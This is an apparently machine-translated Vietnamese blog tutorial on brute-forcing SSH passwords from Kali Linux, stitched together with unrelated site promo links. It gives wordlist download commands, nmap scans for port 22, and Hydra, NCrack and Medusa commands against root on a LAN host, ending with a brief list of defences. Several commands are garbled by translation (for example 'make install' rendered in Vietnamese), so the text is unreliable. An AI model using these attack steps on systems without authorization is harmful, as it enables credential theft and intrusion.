Cách sử dụng Brute Force Attack

Bạn đang xem: NEW Hướng Dẫn Sử Dụng Phần Mềm Brute Force, Brute Force Attack Và Cách Phòng Chống Tại Chung Cu Bohemiaresidence

Hello quý khách. Bữa nay, mình xin chia sẽ về chủ đề Hướng Dẫn Sử Dụng Phần Mềm Brute Force, Brute Force Attack Và Cách Phòng Chống bằng bài viết Hướng Dẫn Sử Dụng Phần Mềm Brute Force, Brute Force Attack Và Cách Phòng Chống

Phần lớn nguồn đều đc lấy thông tin từ những nguồn website đầu ngành khác nên sẽ có vài phần khó hiểu.

Mong mọi người thông cảm, xin nhận góp ý và gạch đá dưới bình luận

Khuyến nghị:

Xin quý khách đọc nội dung này ở nơi riêng tư cá nhân để có hiệu quả tốt nhất
Tránh xa tất cả những thiết bị gây xao nhoãng trong công việc tập kết
Bookmark lại nội dung bài viết vì mình sẽ update hàng tháng

Xin chào mọi người, hôm nay bạn có khỏe không: D. Tôi vừa học được một phương pháp hack mới, tôi muốn giới thiệu với các bạn ngay sau đây. Đó là phương pháp Brute Force Attack mà tôi sẽ cùng bạn tìm hiểu và cách thực hiện trên nền tảng Kali Linux. Bài viết sẽ cố gắng trình bày nó một cách đơn giản nhất, và giải thích tất cả những gì bạn muốn biết.

Bạn đang xem: hướng dẫn sử dụng phần mềm brute force

Đầu tiên, SSH là gì?

Đối với những người quản trị hệ thống sẽ không còn xa lạ với thuật ngữ này. SSH là từ viết tắt của Secure Shell, truy cập máy từ xa thông qua cơ chế dòng lệnh được mã hóa. SSH giúp người dùng dễ dàng kết nối với cục bộ và truy cập máy tính từ xa. Trên hệ thống Linux / Unix, SSH có thể được cài đặt dễ dàng, tương tự như trên máy tính Windows.

Các ứng dụng SSH?

Như đã thảo luận, SSH cung cấp xác thực mạnh mẽ và dữ liệu kết nối được mã hóa giữa hai máy tính trong một môi trường không an toàn như Internet. Hiện tại, giao thức này đã được hầu hết các quản trị viên hệ thống sử dụng để kết nối từ xa với các máy khác, thực hiện các thao tác dòng lệnh, tạo, chỉnh sửa và xóa các tập tin trên các máy khác.

HOT NEW Giá Eth Hiện Tại - Giá Ethereum [Eth] Mới Nhất Hôm Nay

SSH sử dụng thuật toán mã hóa RSA, tạo đường hầm kết nối giữa máy chủ và máy từ xa. Dữ liệu trao đổi giữa hai máy này sẽ được mã hóa để hacker không thể bắt gói tin và giải mã được.

Brute Force Attack là gì?

Hình trên minh họa hoàn toàn phương pháp Brute Force Attack. Chúng ta hãy xem xét kỹ hơn và tìm hiểu nó hoạt động như thế nào.

Brute Force Attack hoạt động bằng cách kiểm tra lần lượt từng tổ hợp mật khẩu có thể có, sau đó kiểm tra xem đó có phải là mật khẩu chính xác hay không. Để biết mật khẩu là đúng hay sai, nó sẽ kiểm tra kết quả trả về của máy chủ.

Với mật khẩu dài hơn, thời gian dò tìm mật khẩu cũng sẽ tăng lên tương ứng. Vì vậy, chúng tôi hiểu tại sao các chuyên gia bảo mật luôn khuyến khích người dùng đặt mật khẩu càng dài càng tốt.

Trong nhiều trường hợp, chúng tôi đã sử dụng phương pháp tấn công từ điển để phát hiện mẫu Mật khẩu chính xác. Trong phương pháp này, tôi được cung cấp một công cụ có danh sách mật khẩu có thể được sử dụng cho hệ thống đích và nó sẽ bắt đầu quét cho đến khi mật khẩu khớp với mẫu mà người dùng sử dụng.

Những mật khẩu tương đối yếu như 123456 hay password tuy ít nhưng vẫn có người sử dụng, nếu may mắn chúng ta có thể mở khóa mật khẩu với thời gian nhanh nhất.

Hình ảnh này cho thấy cách thức hoạt động của cuộc tấn công Brute Force.

Brute Force SSH:

Bây giờ bạn đã biết cách Brute Force hoạt động, hãy chuyển sang bước tiếp theo. Trong suốt chủ đề này, chúng tôi sẽ sử dụng một cuộc tấn công từ điển để lấy mật khẩu của Người dùng SSH.

Xem thêm: Kiểm Tra Số Tài Khoản Ngân Hàng Đông Á, Ngân hàng Đông Á điện tử

Để thực hiện cuộc tấn công này, chúng ta cần một danh sách các từ thường được sử dụng để đặt mật khẩu, và công cụ sẽ liên tục kết hợp các từ này với nhau để tạo ra từng mẫu mật khẩu. Danh sách nguồn của các từ khóa mật khẩu thường được sử dụng có thể được tìm thấy tại đây.

HOT MỚI Cách tính hoang ốc làm nhà chính xác nhất hiện nay mà bạn chưa biết

Ví dụ về loại mật khẩu này là thanhtam0911 trong đó Thanh Tâm là tên của người bị hack, 09-11 là ngày sinh của họ. Một chương trình rất tốt có thể được sử dụng để dịch những từ khóa này là D0xk1t của Ex0dus_0x, bạn có thể tải xuống tại đây.

Bạn cũng có thể tải xuống các danh sách từ khóa khác bằng cách gõ lệnh:

wget //zeldor.biz/other/bruteforce/passlist.txt

wget //downloads.skullsecurity.org/passwords/500-worst-passwords.txt.bz2

//hashes.org/crackers.php

//wiki.skullsecurity.org/Passwords

và nếu bạn đang sử dụng Kali Linux, bạn có thể xem danh sách từ khóa mặc định được đặt tại:

/usr/share/wordlists/rockyou.txt.gz

Quét Máy chủ SSH bằng NMAP:

Sau khi đã chuẩn bị đầy đủ các công cụ để tấn công, bước tiếp theo cần làm là tìm xem máy chủ nào đang chạy SSH. Chúng tôi sẽ sử dụng NMAP để quét cổng 22, là cổng của dịch vụ SSH.

Trong ví dụ này, vì chúng ta chỉ cần tìm SSH Server trong mạng cục bộ, chúng ta sẽ quét mạng 192.168.1.0/24. Đây là lệnh NMAP mà bạn có thể sử dụng để quét tất cả các máy tính:

nmap 192.168.1.0/24 -p22

Quét một máy cụ thể:

Nếu bạn muốn cố gắng tấn công vào một máy chủ từ xa nhất định, bạn phải quét cổng ssh đang mở trên đó bằng lệnh:

nmap -p22

Thực hiện một cuộc tấn công Brute Force SSH:

Sau khi hoàn thành mọi khâu chuẩn bị, chúng ta sẽ đến với phần chính của bài viết, tấn công Brute Force. Các công cụ được sử dụng bao gồm:

HydraNCrackMedusa

Sử dụng Hydra:

Hydra là một công cụ được sử dụng phổ biến, rất mạnh mẽ. Nếu bạn sử dụng hệ điều hành Kali Linux, công cụ này đã được cài đặt sẵn. Và đối với các phiên bản Debian khác, hãy sử dụng lệnh:

sudo apt-get install hydra hydra-gtk

Phiên bản Hydra 8.0: có thể được cài đặt từ kho: ppa: pi-rho / security

sudo add-apt-repository ppa: pi-rho / security

sudo apt-get cập nhật

sudo apt-get install hydra

Một tùy chọn cài đặt khác:

wget //www.thc.org/releases/hydra-8.3.tar.gz

tar -xvzf hydra-8.3.tar.gz

cd hydra-8.3 ​​./configure make

thực hiện cài đặt

Sau khi cài đặt, chúng tôi có thể khởi động cuộc tấn công.

Lệnh sử dụng hydra:

: ~ / Desktop # hydra -l root -P /root/Desktop/500-worst-passwords.txt 192.168.1.31 ssh

Như bạn thấy, Hydra đã thành công trong việc tìm ra tài khoản và mật khẩu dùng để đăng nhập vào hệ thống.

HOT NEW The Triple Bottom Line Là Gì ? Định Nghĩa, Ví Dụ, Giải Thích

Đây là video giải thích quá trình tấn công.

Sử dụng NCrack:

Công cụ thứ hai được sử dụng là NCrack, cũng được cài đặt sẵn trong Kali Linux và bạn cũng có thể cài đặt nó trong các phiên bản Debian khác:

wget //nmap.org/ncrack/dist/ncrack-0.5.tar.gz

tar -xvzf ncrack-0.5.tar.gz

cd ncrack-0,5

./configure

chế tạo

thực hiện cài đặt

Quá trình cài đặt sẽ diễn ra và sau đó bạn có thể chạy công cụ để bẻ khóa mật khẩu.

: ~ / Desktop # ncrack -p 22 user root -P /root/Desktop/500-worst-passwords.txt 192.168.1.31

Công cụ đã phát hiện tên người dùng và mật khẩu. Dưới đây là video hướng dẫn.

Sử dụng Medusa:

Đây là công cụ cuối cùng trong bài có thể dùng để thực hiện Brute Force Attack, hãy cài đặt công cụ:

wget //www.foofus.net/jmk/tools/medusa-2.0.tar.gz

tar -xvzf medusa-2.0.tar.gz

cd medusa-2.0

./configure

chế tạo

thực hiện cài đặt

Lệnh dùng để bẻ khóa mật khẩu:

: ~ / Desktop # medusa -u root -P /root/Desktop/500-worst-passwords.txt -h 192.168.1.31 -M ssh

Như trong hình, phần mềm đã phát hiện người dùng và mật khẩu. Dưới đây là Hình minh họa Video.

Vậy nếu rơi vào trường hợp nạn nhân, bạn phải làm gì để phòng tránh cơn nguy kịch?

Các phương pháp thường được khuyến nghị để tránh các cuộc tấn công thường được triển khai là:

Chạy SSH trên các Cổng khác [ngoài 22] Chặn Đăng nhập SSH bằng tài khoản Người dùng gốc. Cài đặt bằng Fail2ban. Hạn chế số lần đăng nhập của người dùng.

Tóm lược :

Qua bài kiểm tra, chúng tôi rút ra được một kinh nghiệm đó là: đừng bao giờ sử dụng Mật khẩu đơn giản. Và chúng tôi cũng biết cách sử dụng Công cụ để kiểm tra và thử nghiệm các vấn đề. Mọi ý kiến ​​đóng góp các bạn vui lòng để lại bình luận bên dưới bài viết, rất vui vì những đóng góp của các bạn để Website ngày càng hoàn thiện hơn.

Huong dan brute force attackMáy chủ ssh tấn công Brute ForceCông cụ tấn công vũ lựcNgăn chặn cuộc tấn công bằng lực lượng chổi quét máy chủ ssh
Thể loại: Đầu tư

Nguồn tổng hợp

Bruteforceattack
Cách sử dụng Brute Force
Bruteforceattack tool
Bruteforceattack download PC
Cách dụng Brute Force
Phầnmềmtạo wordlist
Hydrabrute forceSSH
Phầnmềmtạo từ điển Password
Xem thêm bài viết thuộc chuyên mục: Phong Thủy

Video liên quan

Chủ Đề